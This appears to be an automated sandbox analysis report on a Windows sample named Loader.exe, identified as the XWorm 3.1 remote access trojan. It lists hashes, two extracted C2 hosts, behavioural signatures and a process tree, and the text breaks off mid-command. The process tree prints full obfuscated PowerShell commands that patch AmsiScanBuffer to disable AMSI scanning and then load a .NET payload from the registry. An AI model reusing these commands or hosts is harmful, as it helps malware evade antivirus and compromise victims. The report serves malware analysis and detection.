Analysis
-
max time kernel
45s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
14/05/2024, 14:02
General
-
Target
Loader.exe
-
Size
4.6MB
-
MD5
5306507bb5ceff20d697f105efe367d5
-
SHA1
c84d9767623ccca88c880bdf94367d98ef7d2de2
-
SHA256
0134ab9082a5cf03a5db6ab712a04d3dcf21501bdc018840016b055b34ae2055
-
SHA512
18adba264c1bf9458991cdab82fc83c23477c87e42d60ae1b4c10e161ba4d1fe5d804f91bb7c0dff18b8997469b066784bf5592de1ee81a8f09e2e97c97041f2
-
SSDEEP
98304:8T0UaoBRvuLNijSkaLAZ4CGySQmqEC/EmvHCuAMHBQe8:M0UdfvuEjSaSC9SQDECdidwBr8
Score
10/10
Malware Config
Extracted
Family
xworm
Version
3.1
C2
profile-indians.gl.at.ply.gg:39017
built-illegal.gl.at.ply.gg:51660
Attributes
-
Install_directory
%AppData%
-
install_file
USB.exe
aes.plain
Signatures
-
Detect Xworm Payload 4 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 20 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 37 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 41 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Drops file in System32 directory 25 IoCs
-
Suspicious use of SetThreadContext 16 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
-
Enumerates system info in registry 2 TTPs 11 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 5 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c376be5a-5d3d-4da8-baf7-b411da6fdb1a}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{05cbf2ed-ff7b-4996-8bc8-75d8d25106af}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{33ca47f9-31c2-476a-8e9c-411c7ca392f7}2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2e61ff10-91ec-4ed9-931f-b4e623dcc5f7}2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5012 -s 2883⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{e6631768-056f-4605-982e-19a6a3ca87e9}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{58c252e3-ffc2-49bf-9967-66c6a62942da}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6dc5a5e8-b70f-4ea6-a1fb-d87df1dd1258}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f3b1d250-7105-4304-af25-f6325991654f}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5604f2cf-0566-4e09-a077-3ef8c153d3b7}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{7ecad330-edaa-4b78-841b-e88874196146}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a34d22c9-a9df-4d3c-8f1b-222a69db41ca}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{125e2bad-9e75-4116-9e4f-f61b82cd3cb5}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{383485fc-41c5-4e6b-a515-ad1b155ef7e7}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d03949da-1cf5-4cc7-bbd2-5ba8844520c9}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a376aac2-b7b4-4886-941f-d92f1098b649}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f84e90b5-a6de-40ad-b12b-a27cb7dcdb05}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{745409e7-edca-4c9d-a28b-694581195c37}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{321c4f64-c9c0-4f46-b209-f630cedfb6f8}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ea2bf6ed-20fb-43cc-bf2d-f8b93d3b9bd4}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{37dde812-d0f6-4712-83e7-12ab4c14b1cc}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c8e5f36a-3ec9-41f3-804c-f84b7f7f80b4}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{af7aac41-4489-4e38-a088-af2b11325c6a}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{886510f6-340c-46d8-bdd3-fb4cacbe8a00}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ec793d63-b36e-4111-b1b6-b1121a1d83a9}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5565b8bb-9eb4-4b08-8d7e-f5813ba60d2c}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{26386d6a-fb56-44a0-846e-11d45d7ba3f8}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{df719ef2-e13c-4e7d-bf84-f063e7cf99cd}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{15de8a84-d55c-4f07-aaca-c38cc6d1bafa}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{0bf55cff-b883-452b-adc4-24ebcfec9229}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{30a07a5f-161c-4d9e-b61d-32ed906566b3}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{70e2aa1e-ea22-48c3-94c2-9e90d563ae1e}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{308082e3-1d64-40a1-9ed0-08e55567f5e4}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{69525191-3435-4b88-a80f-180b8b939638}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f17f58a0-45a4-4509-bfa4-f2d9a8cb5f91}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{84d613e6-bdc3-4a83-9b5d-289976fa76fa}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5eaf19bd-65e0-4fff-b5f4-9e2b5be497db}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{710d53d8-5b4d-4c74-acae-ba3c2035b2de}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d431980e-aa02-4ea7-a1be-8f42b95b55e9}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{fc986c73-3028-4bcd-92fe-18fe3669713f}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a53b178b-c1e6-4ce4-9905-199f5833be01}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{4b0e5043-c3d2-4998-908b-061854597f32}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{3d08bde2-aace-49e9-b1e0-f99089b31dc7}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6aa0cd99-5b59-4c7e-8fe7-e382e4465b8b}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{804e9766-f7f3-4373-96e1-a20fc6726fad}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c05b9075-fc69-495a-bbfa-87f8b4de280a}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6b2babb5-3e1a-4ec2-8238-f6cb45af2abf}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{0381f49e-183a-4c9b-b026-27e7b25bc5c5}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2ab72a62-1dde-45dd-a168-991ac9cdec34}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{09fbafef-01db-4403-b070-9bf53ff9c398}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ee3ab1ac-09eb-414b-b473-6b3150a68281}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{7b1c4f70-2c95-459e-a53b-fb6b78453123}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c5a3ec18-3827-473f-9b88-2054fd615f30}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1f322a70-13b5-467c-a911-bcab5d9f35ca}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{38537aec-a61a-4ce5-a61c-4aac784d00f4}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{93837151-3a19-4abe-ab77-66d1e4486158}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{833f5c3f-e546-4766-8b4f-b65a370bbda7}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{afc36307-da3a-4477-af1e-31dd12f36bc5}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f3aba4b8-4442-4e27-9012-418241f7a012}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{842972a3-fdc7-452f-9b81-471f72875c67}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{4c43614a-ec8d-4bdc-bd72-45fc6b888215}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f7b1a2c4-bbc5-4673-af09-7128eab8fdf9}2⤵
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:qtpqCkJgKrOW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fNNoSPXchutdmP,[Parameter(Position=1)][Type]$WDUTgswKDS)$NiENMlRaFzB=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+[Char](100)+'De'+'l'+''+[Char](101)+''+[Char](103)+'a'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+[Char](109)+'or'+[Char](121)+''+'M'+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType('My'+'D'+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+'T'+''+[Char](121)+''+'p'+''+'e'+'',''+'C'+''+'l'+''+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+'blic'+[Char](44)+''+'S'+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+'s'+''+'i'+''+'C'+''+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+''+[Char](65)+'utoC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$NiENMlRaFzB.DefineConstructor('RT'+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'yS'+[Char](105)+''+[Char](103)+''+','+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fNNoSPXchutdmP).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NiENMlRaFzB.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+'oke','P'+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+'u'+''+'a'+'l',$WDUTgswKDS,$fNNoSPXchutdmP).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'tim'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'nage'+[Char](100)+'');Write-Output $NiENMlRaFzB.CreateType();}$VNPwsxFudLGrW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+'l'+'l')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'ro'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'N'+'a'+''+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+'t'+'h'+[Char](111)+''+'d'+''+[Char](115)+'');$ImxjCSKUaBZTmK=$VNPwsxFudLGrW.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+'o'+[Char](99)+'A'+'d'+''+[Char](100)+''+[Char](114)+'ess',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JNvwZGwhlHBVYygesho=qtpqCkJgKrOW @([String])([IntPtr]);$OIAKeyVmmYZmmtFJdgWVio=qtpqCkJgKrOW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$katvPFMwKnM=$VNPwsxFudLGrW.GetMethod('G'+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+'e'+'H'+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$SqjeEAYXtSoiyH=$ImxjCSKUaBZTmK.Invoke($Null,@([Object]$katvPFMwKnM,[Object]('L'+[Char](111)+'a'+'d'+''+'L'+''+'i'+''+'b'+'ra'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$cyyNWZsMkUriovhtp=$ImxjCSKUaBZTmK.Invoke($Null,@([Object]$katvPFMwKnM,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+'t')));$EPVcVbx=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SqjeEAYXtSoiyH,$JNvwZGwhlHBVYygesho).Invoke(''+[Char](97)+'m'+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'');$GtBgDTlIcZBBYjTTs=$ImxjCSKUaBZTmK.Invoke($Null,@([Object]$EPVcVbx,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+[Char](117)+''+'f'+''+[Char](102)+''+'e'+''+[Char](114)+'')));$dewFsgaKih=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cyyNWZsMkUriovhtp,$OIAKeyVmmYZmmtFJdgWVio).Invoke($GtBgDTlIcZBBYjTTs,[uint32]8,4,[ref]$dewFsgaKih);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GtBgDTlIcZBBYjTTs,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cyyNWZsMkUriovhtp,$OIAKeyVmmYZmmtFJdgWVio).Invoke($GtBgDTlIcZBBYjTTs,[uint32]8,0x20,[ref]$dewFsgaKih);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'TW'+[Char](65)+''+'R'+'E').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUuesjtsFWXR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mJcDZYDeQgctuP,[Parameter(Position=1)][Type]$vEgezjdjPE)$kPMSrRIxqwb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+''+[Char](108)+''+'e'+''+'c'+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+'m'+''+'o'+''+[Char](114)+'y'+'M'+'od'+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+'yD'+'e'+'l'+[Char](101)+'ga'+'t'+''+[Char](101)+''+'T'+''+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+'A'+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+'Cl'+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$kPMSrRIxqwb.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+'eci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+'e'+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+','+'P'+'u'+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$mJcDZYDeQgctuP).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$kPMSrRIxqwb.DefineMethod(''+'I'+'n'+'v'+''+[Char](111)+'k'+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+''+'l'+'i'+[Char](99)+','+'H'+'i'+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+','+'N'+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+''+[Char](116)+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+'',$vEgezjdjPE,$mJcDZYDeQgctuP).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $kPMSrRIxqwb.CreateType();}$lqueZKCkmCFST=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+'t'+'e'+''+[Char](109)+'.'+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+'os'+'o'+''+[Char](102)+''+'t'+'.W'+'i'+''+[Char](110)+'3'+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+'i'+'v'+[Char](101)+'M'+'e'+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$dAuhvlDnNnMQNh=$lqueZKCkmCFST.GetMethod('G'+'e'+''+[Char](116)+''+[Char](80)+''+'r'+''+'o'+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WicKwZciwkxYdZeVasF=gUuesjtsFWXR @([String])([IntPtr]);$MluNpvLCFzqztgWBkRBrbR=gUuesjtsFWXR @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JwzjlatXfiZ=$lqueZKCkmCFST.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+'3'+'2'+''+'.'+'d'+[Char](108)+''+'l'+'')));$CLzPnUusdVZwdi=$dAuhvlDnNnMQNh.Invoke($Null,@([Object]$JwzjlatXfiZ,[Object]('L'+'o'+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+''+[Char](98)+'rar'+[Char](121)+''+'A'+'')));$TxjQelbqexZukYldr=$dAuhvlDnNnMQNh.Invoke($Null,@([Object]$JwzjlatXfiZ,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+'t'+'e'+[Char](99)+''+[Char](116)+'')));$JOUzcOl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CLzPnUusdVZwdi,$WicKwZciwkxYdZeVasF).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$UXdpPadCmtPwFuZra=$dAuhvlDnNnMQNh.Invoke($Null,@([Object]$JOUzcOl,[Object](''+[Char](65)+''+[Char](109)+'si'+[Char](83)+''+'c'+'a'+[Char](110)+'B'+'u'+''+'f'+''+'f'+''+'e'+''+'r'+'')));$tjnnDfGOLS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TxjQelbqexZukYldr,$MluNpvLCFzqztgWBkRBrbR).Invoke($UXdpPadCmtPwFuZra,[uint32]8,4,[ref]$tjnnDfGOLS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$UXdpPadCmtPwFuZra,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TxjQelbqexZukYldr,$MluNpvLCFzqztgWBkRBrbR).Invoke($UXdpPadCmtPwFuZra,[uint32]8,0x20,[ref]$tjnnDfGOLS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:mBQYZHpyLvbl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TdJGXyypLuvpZO,[Parameter(Position=1)][Type]$fxMVmgtsMt)$fJQFizuUZGs=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 